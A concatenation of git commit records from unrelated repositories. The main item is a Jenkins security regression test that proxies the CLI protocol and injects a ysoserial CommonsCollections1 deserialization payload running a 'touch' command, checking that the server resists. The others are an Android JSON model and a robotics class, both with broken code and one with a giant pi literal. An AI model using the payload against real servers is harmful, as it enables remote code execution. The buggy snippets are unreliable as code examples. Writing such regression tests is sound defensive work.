realOS.write(data.length % 256); realOS.write(data); } else { System.err.print("→ "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); realOS.write(toCopy.toByteArray()); } break; } } } catch (Exception x) { x.printStackTrace(); } } }); } catch (IOException x) { x.printStackTrace(); } } }); try { executors.submit(new Runnable() { @Override public void run() { // Bypassing _main because it does nothing interesting here. // Hardcoding CLI protocol version 1 (CliProtocol) because it is easier to sniff. try { new CLI(r.getURL()) { @Override protected CliPort getCliTcpPort(String url) throws IOException { return new CliPort(new InetSocketAddress(proxySocket.getInetAddress(), proxySocket.getLocalPort()), /* ignore identity */ null, 1); } }.execute("help"); } catch (Exception x) { x.printStackTrace(); } } }).get(5, TimeUnit.SECONDS); } catch (TimeoutException x) { System.err.println("CLI command timed out"); } try { wc.getPage(url + "userContent/pwned"); fail("Pwned!"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } } } private static synchronized void display(byte[] data) { for (byte c : data) { if (c >= ' ' && c <= '~') { System.err.write(c); } else { System.err.printf("\\x%02X", c); } } } private static synchronized void showSer(byte[] data) { try { Object o = Serializables.deserialize(data); System.err.print(o); } catch (Exception x) { System.err.printf("<%s>", x); } } /** An attack payload, as a Java serialized object ({@code \xAC\ED…}). */ private byte[] payload() throws Exception { File home = overrideHome == null ? r.jenkins.root : new File(overrideHome); // TODO find a Windows equivalent return Serializables.serialize(new CommonsCollections1().getObject("touch " + new File(new File(home, "userContent"), "pwned"))); } }
test/src/test/java/jenkins/security/Security218BlackBoxTest.java
/* * The MIT License * * Copyright 2015 CloudBees, Inc. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ package jenkins.security; import com.gargoylesoftware.htmlunit.FailingHttpStatusCodeException; import hudson.cli.CLI; import hudson.cli.CliPort; import hudson.remoting.BinarySafeStream; import hudson.util.DaemonThreadFactory; import java.io.ByteArrayOutputStream; import java.io.DataOutputStream; import java.io.File; import java.io.IOException; import java.io.InputStream; import java.io.OutputStream; import java.net.HttpURLConnection; import java.net.InetSocketAddress; import java.net.ServerSocket; import java.net.Socket; import java.net.URL; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; import java.util.concurrent.TimeUnit; import java.util.concurrent.TimeoutException; import jenkins.security.security218.ysoserial.payloads.CommonsCollections1; import jenkins.security.security218.ysoserial.util.Serializables; import static org.junit.Assert.*; import org.junit.Test; import org.junit.Rule; import org.jvnet.hudson.test.JenkinsRule; import org.jvnet.hudson.test.recipes.PresetData; public class Security218BlackBoxTest { private static final String overrideURL = System.getenv("JENKINS_URL"); private static final String overrideHome = System.getenv("JENKINS_HOME"); static { assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); } private static final ExecutorService executors = Executors.newCachedThreadPool(new DaemonThreadFactory()); @Rule public JenkinsRule r = new JenkinsRule(); @SuppressWarnings("deprecation") // really mean to use getPage(String) @PresetData(PresetData.DataSet.ANONYMOUS_READONLY) // TODO userContent inaccessible without authentication otherwise @Test public void probe() throws Exception { JenkinsRule.WebClient wc = r.createWebClient(); final URL url = overrideURL == null ? r.getURL() : new URL(overrideURL); wc.getPage(url + "userContent/readme.txt"); try { wc.getPage(url + "userContent/pwned"); fail("already compromised?"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } for (int round = 0; round < 2; round++) { final int _round = round; final ServerSocket proxySocket = new ServerSocket(0); executors.submit(new Runnable() { @Override public void run() { try { Socket proxy = proxySocket.accept(); Socket real = new Socket(url.getHost(), ((HttpURLConnection) url.openConnection()).getHeaderFieldInt("X-Jenkins-CLI-Port", -1)); final InputStream realIS = real.getInputStream(); final OutputStream realOS = real.getOutputStream(); final InputStream proxyIS = proxy.getInputStream(); final OutputStream proxyOS = proxy.getOutputStream(); executors.submit(new Runnable() { @Override public void run() { try { // Read up to \x00\x00\x00\x00, end of header. int nullCount = 0; ByteArrayOutputStream buf = new ByteArrayOutputStream(); int c; while ((c = realIS.read()) != -1) { proxyOS.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } System.err.print("← "); display(buf.toByteArray()); System.err.println(); // Now assume we are in chunked transport. PACKETS: while (true) { buf.reset(); //System.err.println("reading one packet"); while (true) { // one packet, ≥1 chunk //System.err.println("reading one chunk"); int hi = realIS.read(); if (hi == -1) { break PACKETS; } proxyOS.write(hi); int lo = realIS.read(); proxyOS.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; //System.err.printf("waiting for %X bytes%n", len); for (int i = 0; i < len; i++) { c = realIS.read(); proxyOS.write(c); buf.write(c); } if (hasMore) { continue; } System.err.print("← "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); break; } } } catch (IOException x) { x.printStackTrace(); } } }); executors.submit(new Runnable() { @Override public void run() { try { ByteArrayOutputStream buf = new ByteArrayOutputStream(); ByteArrayOutputStream toCopy = new ByteArrayOutputStream(); int c; int nullCount = 0; while ((c = proxyIS.read()) != -1) { toCopy.write(c); buf.write(c); if (c == 0) { if (++nullCount == 4) { break; } } else { nullCount = 0; } } if (_round == 0) { System.err.println("injecting payload into capability negotiation"); // replacing \x00\x14Protocol:CLI-connect<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAP4=\x00\x00\x00\x00 new DataOutputStream(realOS).writeUTF("Protocol:CLI-connect"); // TCP agent protocol byte[] PREAMBLE = "<===[JENKINS REMOTING CAPACITY]===>".getBytes("UTF-8"); // Capability realOS.write(PREAMBLE); OutputStream bss = BinarySafeStream.wrap(realOS); bss.write(payload()); bss.flush(); } else { System.err.print("→ "); display(buf.toByteArray()); System.err.println(); realOS.write(toCopy.toByteArray()); } int packet = 0; PACKETS: while (true) { buf.reset(); toCopy.reset(); while (true) { int hi = proxyIS.read(); if (hi == -1) { break PACKETS; } toCopy.write(hi); int lo = proxyIS.read(); toCopy.write(lo); boolean hasMore = (hi & 0x80) > 0; if (hasMore) { hi &= 0x7F; } int len = hi * 0x100 + lo; for (int i = 0; i < len; i++) { c = proxyIS.read(); toCopy.write(c); buf.write(c); } if (hasMore) { continue; } if (++packet == _round) { System.err.println("injecting payload into packet"); byte[] data = payload(); realOS.write(data.length / 256); realOS.write(data.length % 256); realOS.write(data); } else { System.err.print("→ "); byte[] data = buf.toByteArray(); //display(data); showSer(data); System.err.println(); realOS.write(toCopy.toByteArray()); } break; } } } catch (Exception x) { x.printStackTrace(); } } }); } catch (IOException x) { x.printStackTrace(); } } }); try { executors.submit(new Runnable() { @Override public void run() { // Bypassing _main because it does nothing interesting here. // Hardcoding CLI protocol version 1 (CliProtocol) because it is easier to sniff. try { new CLI(r.getURL()) { @Override protected CliPort getCliTcpPort(String url) throws IOException { return new CliPort(new InetSocketAddress(proxySocket.getInetAddress(), proxySocket.getLocalPort()), /* ignore identity */ null, 1); } }.execute("help"); } catch (Exception x) { x.printStackTrace(); } } }).get(5, TimeUnit.SECONDS); } catch (TimeoutException x) { System.err.println("CLI command timed out"); } try { wc.getPage(url + "userContent/pwned"); fail("Pwned!"); } catch (FailingHttpStatusCodeException x) { assertEquals(404, x.getStatusCode()); } } } private static synchronized void display(byte[] data) { for (byte c : data) { if (c >= ' ' && c <= '~') { System.err.write(c); } else { System.err.printf("\\x%02X", c); } } } private static synchronized void showSer(byte[] data) { try { Object o = Serializables.deserialize(data); System.err.print(o); } catch (Exception x) { System.err.printf("<%s>", x); } } /** An attack payload, as a Java serialized object ({@code \xAC\ED…}). */ private byte[] payload() throws Exception { File home = overrideHome == null ? r.jenkins.root : new File(overrideHome); // TODO find a Windows equivalent return Serializables.serialize(new CommonsCollections1().getObject("touch " + new File(new File(home, "userContent"), "pwned"))); } }
Need to rename environment variables since $JENKINS_URL is defined on CI.
test/src/test/java/jenkins/security/Security218BlackBoxTest.java
Need to rename environment variables since $JENKINS_URL is defined on CI.
<ide><path>est/src/test/java/jenkins/security/Security218BlackBoxTest.java <ide> <ide> public class Security218BlackBoxTest { <ide> <del> private static final String overrideURL = System.getenv("JENKINS_URL"); <del> private static final String overrideHome = System.getenv("JENKINS_HOME"); <add> private static final String overrideURL = System.getenv("VICTIM_JENKINS_URL"); <add> private static final String overrideHome = System.getenv("VICTIM_JENKINS_HOME"); <ide> static { <ide> assertTrue("$JENKINS_URL and $JENKINS_HOME must both be defined together", (overrideURL == null) == (overrideHome == null)); <ide> }
Java
mit
error: pathspec 'GenericLocationModel.java' did not match any file(s) known to git
4b9bf0e9cbccceedb77de198b39b0a22ebe10b4b
1
code-for-coffee/AndroidSnippets
public class GenericLocationModel { LocationModel(JSONObject Json) throws JSONException, MalformedURLException { for(int i = 0; i< Json.names().length(); i++){ String key = Json.names().getString(i); String val = Json.get(Json.names().getString(i)).toString(); switch (val) { case "city": this.City = val; break; case "name": this.Name = val; break; case "website_url": this.Url = new URL(val); break; case "id": this.Id = new Integer(val); break; case "address": this.Address = val; break; case "state": this.State = val; break; case "zipcode": this.ZipCode = val; break; case "latitude": this.Latitude = new Double(val); break; case "longitude": this.Longitude = new Double(val); break; case "photo": this.Photo = new URL(val); break; case "email": this.Email = val; break; } } } // public information public Integer Id; public String City; public String Name; public URL Url; public String Address; public String State; public String ZipCode; public Double Latitude; public Double Longitude; public URL Photo; public String Email; public Integer getId() { return Id; } public void setId(Integer id) { Id = id; } public String getCity() { return City; } public void setCity(String city) { City = city; } public String getName() { return Name; } public void setName(String name) { Name = name; } public URL getUrl() { return Url; } public void setUrl(URL url) { Url = url; } public String getAddress() { return Address; } public void setAddress(String address) { Address = address; } public String getState() { return State; } public void setState(String state) { State = state; } public String getZipCode() { return ZipCode; } public void setZipCode(String zipCode) { ZipCode = zipCode; } public Double getLatitude() { return Latitude; } public void setLatitude(Double latitude) { Latitude = latitude; } public Double getLongitude() { return Longitude; } public void setLongitude(Double longitude) { Longitude = longitude; } public URL getPhoto() { return Photo; } public void setPhoto(URL photo) { Photo = photo; } public String getEmail() { return Email; } public void setEmail(String email) { Email = email; } }
GenericLocationModel.java
adding a generic location file that expects some json
GenericLocationModel.java
adding a generic location file that expects some json
<ide><path>enericLocationModel.java <add>public class GenericLocationModel { <add> <add> LocationModel(JSONObject Json) throws JSONException, MalformedURLException { <add> <add> for(int i = 0; i< Json.names().length(); i++){ <add> String key = Json.names().getString(i); <add> String val = Json.get(Json.names().getString(i)).toString(); <add> <add> switch (val) { <add> case "city": <add> this.City = val; <add> break; <add> case "name": <add> this.Name = val; <add> break; <add> case "website_url": <add> this.Url = new URL(val); <add> break; <add> case "id": <add> this.Id = new Integer(val); <add> break; <add> case "address": <add> this.Address = val; <add> break; <add> case "state": <add> this.State = val; <add> break; <add> case "zipcode": <add> this.ZipCode = val; <add> break; <add> case "latitude": <add> this.Latitude = new Double(val); <add> break; <add> case "longitude": <add> this.Longitude = new Double(val); <add> break; <add> case "photo": <add> this.Photo = new URL(val); <add> break; <add> case "email": <add> this.Email = val; <add> break; <add> } <add> } <add> } <add> <add> // public information <add> public Integer Id; <add> public String City; <add> public String Name; <add> public URL Url; <add> public String Address; <add> public String State; <add> public String ZipCode; <add> public Double Latitude; <add> public Double Longitude; <add> public URL Photo; <add> public String Email; <add> <add> public Integer getId() { <add> return Id; <add> } <add> <add> public void setId(Integer id) { <add> Id = id; <add> } <add> <add> public String getCity() { <add> return City; <add> } <add> <add> public void setCity(String city) { <add> City = city; <add> } <add> <add> public String getName() { <add> return Name; <add> } <add> <add> public void setName(String name) { <add> Name = name; <add> } <add> <add> public URL getUrl() { <add> return Url; <add> } <add> <add> public void setUrl(URL url) { <add> Url = url; <add> } <add> <add> public String getAddress() { <add> return Address; <add> } <add> <add> public void setAddress(String address) { <add> Address = address; <add> } <add> <add> public String getState() { <add> return State; <add> } <add> <add> public void setState(String state) { <add> State = state; <add> } <add> <add> public String getZipCode() { <add> return ZipCode; <add> } <add> <add> public void setZipCode(String zipCode) { <add> ZipCode = zipCode; <add> } <add> <add> public Double getLatitude() { <add> return Latitude; <add> } <add> <add> public void setLatitude(Double latitude) { <add> Latitude = latitude; <add> } <add> <add> public Double getLongitude() { <add> return Longitude; <add> } <add> <add> public void setLongitude(Double longitude) { <add> Longitude = longitude; <add> } <add> <add> public URL getPhoto() { <add> return Photo; <add> } <add> <add> public void setPhoto(URL photo) { <add> Photo = photo; <add> } <add> <add> public String getEmail() { <add> return Email; <add> } <add> <add> public void setEmail(String email) { <add> Email = email; <add> } <add>}
Java
bsd-3-clause
b270b052bf904ad6b4d6da49e052ac59cf47e3ae
0
amesrobotics/2013robot
/* * To change this template, choose Tools | Templates * and open the template in the editor. * * This class polls robot sensors and switches, such as gyros, buttons, and accelerometers. */ /* * This is a test to teach programming team. */ package edu.ames.frc.robot; import com.sun.squawk.util.MathUtils; import edu.wpi.first.wpilibj.Gyro; public class SensorInput { static RobotMap rm = new RobotMap(); static Gyro gy; // /* Initialize sensor values & variables */ void init() { gy = new Gyro(rm.gyroport); gy.reset(); } public void getFinalAngle(){ double rad = 0; rad = getGyroAngle(); rad = convertToRadian; } /* Get the absolute angle of the robot */ double getGyroAngle() { double a = gy.getAngle(); return a; } double convertToRadian(double deg){ deg = 180/3.141592653589793238462643383279502884197169399375105820974944592307816406286208998628034825342117067982148086513282306647093844609550582231725359408128481117450284102701938521105559644622948954930381964428810975665933446128475648233786783165271201909145648566923460348610454326648213393607260249141273724587006606315588174881520920962829254091715364367892590360011330530548820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938183011949129833673362440656643086021394946395224737190702179860943702770539217176293176752384674818467669405132000568127145263560827785771342757789609173637178721468440901224953430146549585371050792279689258923542019956112129021960864034418159813629774771309960518707211349999998372978049951059731732816096318595024459455346908302642522308253344685035261931188171010003137838752886587533208381420617177669147303598253490428755468731159562863882353787593751957781857780532171226806613001927876611195909216420198938095257201065485863278865936153381827968230301952035301852968995773622599413891249721775283479131515574857242454150695950829533116861727855889075098381754637464939319255060400927701671139009848824012858361603563707660104710181942955596198946767837449448255379774726847104047534646208046684259069491293313677028989152104752162056966024058038150193511253382430035587640247496473263914199272604269922796782354781636009341721641219924586315030286182974555706749838505494588586926995690927210797509302955321165344987202755960236480665499119881834797753566369807426542527862551818417574672890977772793800081647060016145249192173217214772350141441973568548161361157352552133475741849468438523323907394143334547762416862518983569485562099219222184272550254256887671790494601653466804988627232791786085784383827967976681454100953883786360950680064225125205117392984896084128488626945604241965285022210661186306744278622039194945047123713786960956364371917287467764657573962413890865832645995813390478027590099465764078951269468398352595709825822620522489407726719478268482601476990902640136394437455305068203496252451749399651431429809190659250937221696461515709858387410597885959772975498930161753928468138268683868942774155991855925245953959431049972524680845987273644695848653836736222626099124608051243884390451244136549762780797715691435997700129616089441694868555848406353422072225828488648158456028506016842739452267467678895252138522549954666727823986456596116354886230577456498035593634568174324112515076069479451096596094025228879710893145669136867228748940560101503308617928680920874760917824938589009714909675985261365549781893129784821682998948722658804857564014270477555132379641451523746234364542858444795265867821051141354735739523113427166102135969536231442952484937187110145765403590279934403742007310578539062198387447808478489683321445713868751943506430218453191048481005370614680674919278191197939952061419663428754440643745123718192179998391015919561814675142691239748940907186494231961567945208095146550225231603881930142093762137855956638937787083039069792077346722182562599661501421503068038447734549202605414665925201497442850732518666002132434088190710486331734649651453905796268561005508106658796998163574736384052571459102897064140110971206280439039759515677157700420337869936007230558763176359421873125147120532928191826186125867321579198414848829164470609575270695722091756711672291098169091528017350671274858322287183520935396572512108357915136988209144421006751033467110314126711136990865851639831501970165151168517143765761835155650884909989859982387345528331635507647918535893226185489632132933089857064204675259070915481416549859461637180270981994309924488957571282890592323326097299712084433573265489382391193259746366730583604142813883032038249037589852437441702913276561809377344403070746921120191302033038019762110110044929321516084244485963766983895228684783123552658213144957685726243344189303968642624341077322697802807318915441101044682325271620105265227211166039666557309254711055785376346682065310989652691862056476931257058635662018558100729360659876486117910453348850346113657686753249441668039626579787718556084552965412665408530614344431858676975145661406800700237877659134401712749470420562230538994561314071127000407854733269939081454664645880797270826683063432858785698305235808933065757406795457163775254202114955761581400250126228594130216471550979259230990796547376125517656751357517829666454779174501129961489030463994713296210734043751895735961458901938971311179042978285647503203198691514028708085990480109412147221317947647772622414254854540332157185306142288137585043063321751829798662237172159160771669254748738986654949450114654062843366393790039769265672146385306736096571209180763832716641627488880078692560290228472104031721186082041900042296617119637792133757511495950156604963186294726547364252308177036751590673502350728354056704038674351362222477158915049530984448933309634087807693259939780541934144737744184263129860809988868741326047215695162396586457302163159819319516735381297416772947867242292465436680098067692823828068996400482435403701416314965897940924323789690706977942236250822168895738379862300159377647165122893578601588161755782973523344604281512627203734314653197777416031990665541876397929334419521541341899485444734567383162499341913181480927777103863877343177207545654532207770921201905166096280490926360197598828161332316663652861932668633606273567630354477628035045077723554710585954870279081435624014517180624643626794561275318134078330336254232783944975382437205835311477119926063813346776879695970309833913077109870408591337464144282277263465947047458784778720192771528073176790770715721344473060570073349243693113835049316312840425121925651798069411352801314701304781643788518529092854520116583934196562134914341595625865865570552690496520985803385072242648293972858478316305777756068887644624824685792603953527734803048029005876075825104747091643961362676044925627420420832085661190625454337213153595845068772460290161876679524061634252257719542916299193064553779914037340432875262888963995879475729174642635745525407909145135711136941091193932519107602082520261879853188770584297259167781314969900901921169717372784768472686084900337702424291651300500516832336435038951702989392233451722013812806965011784408745196012122859937162313017114448464090389064495444006198690754851602632750529834918740786680881833851022833450850486082503930213321971551843063545500766828294930413776552793975175461395398468339363830474611996653858153842056853386218672523340283087112328278921250771262946322956398989893582116745627010218356462201349671518819097303811980049734072396103685406643193950979019069963955245300545058068550195673022921913933918568034490398205955100226353536192041994745538593810234395544959778377902374216172711172364343543947822181852862408514006660443325888569867054315470696574745855033232334210730154594051655379068662733379958511562578432298827372319898757141595781119635833005940873068121602876496286744604774649159950549737425626901049037781986835938146574126804925648798556145372347867330390468838343634655379498641927056387293174872332083760112302991136793862708943879936201629515413371424892830722012690147546684765357616477379467520049075715552781965362132392640616013635815590742202020318727760527721900556148425551879253034351398442532234157623361064250639049750086562710953591946589751413103482276930624743536325691607815478181152843667957061108615331504452127473924544945423682886061340841486377670096120715124914043027253860764823634143346235189757664521641376796903149501910857598442391986291642193994907236234646844117394032659184044378051333894525742399508296591228508555821572503107125701266830240292952522011872676756220415420516184163484756516999811614101002996078386909291603028840026910414079288621507842451670908700069928212066041837180653556725253256753286129104248776182582976515795984703562226293486003415872298053498965022629174878820273420922224533985626476691490556284250391275771028402799806636582548892648802545661017296702664076559042909945681506526530537182941270336931378517860904070866711496558343434769338578171138645587367812301458768712660348913909562009939361031029161615288138437909904231747336394804575931493140529763475748119356709110137751721008031559024853090669203767192203322909433467685142214477379393751703443661991040337511173547191855046449026365512816228824462575916333039107225383742182140883508657391771509682887478265699599574490661758344137522397096834080053559849175417381883999446974867626551658276584835884531427756879002909517028352971634456212964043523117600665101241200659755851276178583829204197484423608007193045761893234922927965019875187212726750798125547095890455635792122103334669749923563025494780249011419521238281530911407907386025152274299581807247162591668545133312394804947079119153267343028244186041426363954800044800267049624820179289647669758318327131425170296923488962766844032326092752496035799646925650493681836090032380929345958897069536534940603402166544375589004563288225054525564056448246515187547119621844396582533754388569094113031509526179378002974120766514793942590298969594699556576121865619673378623625612521632086286922210327488921865436480229678070576561514463204692790682120738837781423356282360896320806822246801224826117718589638140918390367367222088832151375560037279839400415297002878307667094447456013455641725437090697939612257142989467154357846878861444; //All the decimals return deg; } /* useful to have, just in case our robot gyro drifts */ public void resetGyroAngle() { gy.reset(); } }
src/edu/ames/frc/robot/SensorInput.java
/* * To change this template, choose Tools | Templates * and open the template in the editor. * * This class polls robot sensors and switches, such as gyros, buttons, and accelerometers. */ /* * This is a test to teach programming team. */ package edu.ames.frc.robot; import edu.wpi.first.wpilibj.Gyro; public class SensorInput { static RobotMap rm = new RobotMap(); static Gyro gy; // /* Initialize sensor values & variables */ void init() { gy = new Gyro(rm.gyroport); gy.reset(); } /* Get the absolute angle of the robot */ double getGyroAngle() { double a = gy.getAngle(); return a; } /* useful to have, just in case our robot gyro drifts */ void resetGyroAngle() { gy.reset(); } }
Added PI XD
src/edu/ames/frc/robot/SensorInput.java
Added PI XD
<ide><path>rc/edu/ames/frc/robot/SensorInput.java <ide> * This is a test to teach programming team. <ide> */ <ide> package edu.ames.frc.robot; <del> <add>import com.sun.squawk.util.MathUtils; <ide> import edu.wpi.first.wpilibj.Gyro; <ide> <ide> public class SensorInput { <ide> gy = new Gyro(rm.gyroport); <ide> gy.reset(); <ide> } <add> public void getFinalAngle(){ <add> double rad = 0; <add> rad = getGyroAngle(); <add> rad = convertToRadian; <add> } <ide> <ide> /* Get the absolute angle of the robot */ <ide> double getGyroAngle() { <ide> double a = gy.getAngle(); <ide> return a; <ide> } <add> double convertToRadian(double deg){ <add> deg = 180/3.141592653589793238462643383279502884197169399375105820974944592307816406286208998628034825342117067982148086513282306647093844609550582231725359408128481117450284102701938521105559644622948954930381964428810975665933446128475648233786783165271201909145648566923460348610454326648213393607260249141273724587006606315588174881520920962829254091715364367892590360011330530548820466521384146951941511609433057270365759591953092186117381932611793105118548074462379962749567351885752724891227938183011949129833673362440656643086021394946395224737190702179860943702770539217176293176752384674818467669405132000568127145263560827785771342757789609173637178721468440901224953430146549585371050792279689258923542019956112129021960864034418159813629774771309960518707211349999998372978049951059731732816096318595024459455346908302642522308253344685035261931188171010003137838752886587533208381420617177669147303598253490428755468731159562863882353787593751957781857780532171226806613001927876611195909216420198938095257201065485863278865936153381827968230301952035301852968995773622599413891249721775283479131515574857242454150695950829533116861727855889075098381754637464939319255060400927701671139009848824012858361603563707660104710181942955596198946767837449448255379774726847104047534646208046684259069491293313677028989152104752162056966024058038150193511253382430035587640247496473263914199272604269922796782354781636009341721641219924586315030286182974555706749838505494588586926995690927210797509302955321165344987202755960236480665499119881834797753566369807426542527862551818417574672890977772793800081647060016145249192173217214772350141441973568548161361157352552133475741849468438523323907394143334547762416862518983569485562099219222184272550254256887671790494601653466804988627232791786085784383827967976681454100953883786360950680064225125205117392984896084128488626945604241965285022210661186306744278622039194945047123713786960956364371917287467764657573962413890865832645995813390478027590099465764078951269468398352595709825822620522489407726719478268482601476990902640136394437455305068203496252451749399651431429809190659250937221696461515709858387410597885959772975498930161753928468138268683868942774155991855925245953959431049972524680845987273644695848653836736222626099124608051243884390451244136549762780797715691435997700129616089441694868555848406353422072225828488648158456028506016842739452267467678895252138522549954666727823986456596116354886230577456498035593634568174324112515076069479451096596094025228879710893145669136867228748940560101503308617928680920874760917824938589009714909675985261365549781893129784821682998948722658804857564014270477555132379641451523746234364542858444795265867821051141354735739523113427166102135969536231442952484937187110145765403590279934403742007310578539062198387447808478489683321445713868751943506430218453191048481005370614680674919278191197939952061419663428754440643745123718192179998391015919561814675142691239748940907186494231961567945208095146550225231603881930142093762137855956638937787083039069792077346722182562599661501421503068038447734549202605414665925201497442850732518666002132434088190710486331734649651453905796268561005508106658796998163574736384052571459102897064140110971206280439039759515677157700420337869936007230558763176359421873125147120532928191826186125867321579198414848829164470609575270695722091756711672291098169091528017350671274858322287183520935396572512108357915136988209144421006751033467110314126711136990865851639831501970165151168517143765761835155650884909989859982387345528331635507647918535893226185489632132933089857064204675259070915481416549859461637180270981994309924488957571282890592323326097299712084433573265489382391193259746366730583604142813883032038249037589852437441702913276561809377344403070746921120191302033038019762110110044929321516084244485963766983895228684783123552658213144957685726243344189303968642624341077322697802807318915441101044682325271620105265227211166039666557309254711055785376346682065310989652691862056476931257058635662018558100729360659876486117910453348850346113657686753249441668039626579787718556084552965412665408530614344431858676975145661406800700237877659134401712749470420562230538994561314071127000407854733269939081454664645880797270826683063432858785698305235808933065757406795457163775254202114955761581400250126228594130216471550979259230990796547376125517656751357517829666454779174501129961489030463994713296210734043751895735961458901938971311179042978285647503203198691514028708085990480109412147221317947647772622414254854540332157185306142288137585043063321751829798662237172159160771669254748738986654949450114654062843366393790039769265672146385306736096571209180763832716641627488880078692560290228472104031721186082041900042296617119637792133757511495950156604963186294726547364252308177036751590673502350728354056704038674351362222477158915049530984448933309634087807693259939780541934144737744184263129860809988868741326047215695162396586457302163159819319516735381297416772947867242292465436680098067692823828068996400482435403701416314965897940924323789690706977942236250822168895738379862300159377647165122893578601588161755782973523344604281512627203734314653197777416031990665541876397929334419521541341899485444734567383162499341913181480927777103863877343177207545654532207770921201905166096280490926360197598828161332316663652861932668633606273567630354477628035045077723554710585954870279081435624014517180624643626794561275318134078330336254232783944975382437205835311477119926063813346776879695970309833913077109870408591337464144282277263465947047458784778720192771528073176790770715721344473060570073349243693113835049316312840425121925651798069411352801314701304781643788518529092854520116583934196562134914341595625865865570552690496520985803385072242648293972858478316305777756068887644624824685792603953527734803048029005876075825104747091643961362676044925627420420832085661190625454337213153595845068772460290161876679524061634252257719542916299193064553779914037340432875262888963995879475729174642635745525407909145135711136941091193932519107602082520261879853188770584297259167781314969900901921169717372784768472686084900337702424291651300500516832336435038951702989392233451722013812806965011784408745196012122859937162313017114448464090389064495444006198690754851602632750529834918740786680881833851022833450850486082503930213321971551843063545500766828294930413776552793975175461395398468339363830474611996653858153842056853386218672523340283087112328278921250771262946322956398989893582116745627010218356462201349671518819097303811980049734072396103685406643193950979019069963955245300545058068550195673022921913933918568034490398205955100226353536192041994745538593810234395544959778377902374216172711172364343543947822181852862408514006660443325888569867054315470696574745855033232334210730154594051655379068662733379958511562578432298827372319898757141595781119635833005940873068121602876496286744604774649159950549737425626901049037781986835938146574126804925648798556145372347867330390468838343634655379498641927056387293174872332083760112302991136793862708943879936201629515413371424892830722012690147546684765357616477379467520049075715552781965362132392640616013635815590742202020318727760527721900556148425551879253034351398442532234157623361064250639049750086562710953591946589751413103482276930624743536325691607815478181152843667957061108615331504452127473924544945423682886061340841486377670096120715124914043027253860764823634143346235189757664521641376796903149501910857598442391986291642193994907236234646844117394032659184044378051333894525742399508296591228508555821572503107125701266830240292952522011872676756220415420516184163484756516999811614101002996078386909291603028840026910414079288621507842451670908700069928212066041837180653556725253256753286129104248776182582976515795984703562226293486003415872298053498965022629174878820273420922224533985626476691490556284250391275771028402799806636582548892648802545661017296702664076559042909945681506526530537182941270336931378517860904070866711496558343434769338578171138645587367812301458768712660348913909562009939361031029161615288138437909904231747336394804575931493140529763475748119356709110137751721008031559024853090669203767192203322909433467685142214477379393751703443661991040337511173547191855046449026365512816228824462575916333039107225383742182140883508657391771509682887478265699599574490661758344137522397096834080053559849175417381883999446974867626551658276584835884531427756879002909517028352971634456212964043523117600665101241200659755851276178583829204197484423608007193045761893234922927965019875187212726750798125547095890455635792122103334669749923563025494780249011419521238281530911407907386025152274299581807247162591668545133312394804947079119153267343028244186041426363954800044800267049624820179289647669758318327131425170296923488962766844032326092752496035799646925650493681836090032380929345958897069536534940603402166544375589004563288225054525564056448246515187547119621844396582533754388569094113031509526179378002974120766514793942590298969594699556576121865619673378623625612521632086286922210327488921865436480229678070576561514463204692790682120738837781423356282360896320806822246801224826117718589638140918390367367222088832151375560037279839400415297002878307667094447456013455641725437090697939612257142989467154357846878861444; //All the decimals <add> return deg; <add> } <ide> <ide> /* useful to have, just in case our robot gyro drifts */ <del> void resetGyroAngle() { <add> public void resetGyroAngle() { <ide> gy.reset(); <ide> } <ide>
Java
apache-2.0
c5ed4e26590285ca9b99ad55feb6afd6caa89530
0
semonte/intellij-community,xfournet/intellij-community,da1z/intellij-community,da1z/intellij-community,xfournet/intellij-community,semonte/intellij-community,xfournet/intellij-community,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,ibinti/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,asedunov/intellij-community,allotria/intellij-community,da1z/intellij-community,asedunov/intellij-community,ibinti/intellij-community,suncycheng/intellij-community,asedunov/intellij-community,signed/intellij-community,idea4bsd/idea4bsd,allotria/intellij-community,ThiagoGarciaAlves/intellij-community,semonte/intellij-community,youdonghai/intellij-community,mglukhikh/intellij-community,allotria/intellij-community,semonte/intellij-community,asedunov/intellij-community,da1z/intellij-community,semonte/intellij-community,ibinti/intellij-community,mglukhikh/intellij-community,da1z/intellij-community,xfournet/intellij-community,ibinti/intellij-community,allotria/intellij-community,mglukhikh/intellij-community,apixandru/intellij-community,asedunov/intellij-community,ThiagoGarciaAlves/intellij-community,signed/intellij-community,FHannes/intellij-community,apixandru/intellij-community,asedunov/intellij-community,allotria/intellij-community,ibinti/intellij-community,idea4bsd/idea4bsd,xfournet/intellij-community,FHannes/intellij-community,ThiagoGarciaAlves/intellij-community,xfournet/intellij-community,ThiagoGarciaAlves/intellij-community,idea4bsd/idea4bsd,signed/intellij-community,semonte/intellij-community,allotria/intellij-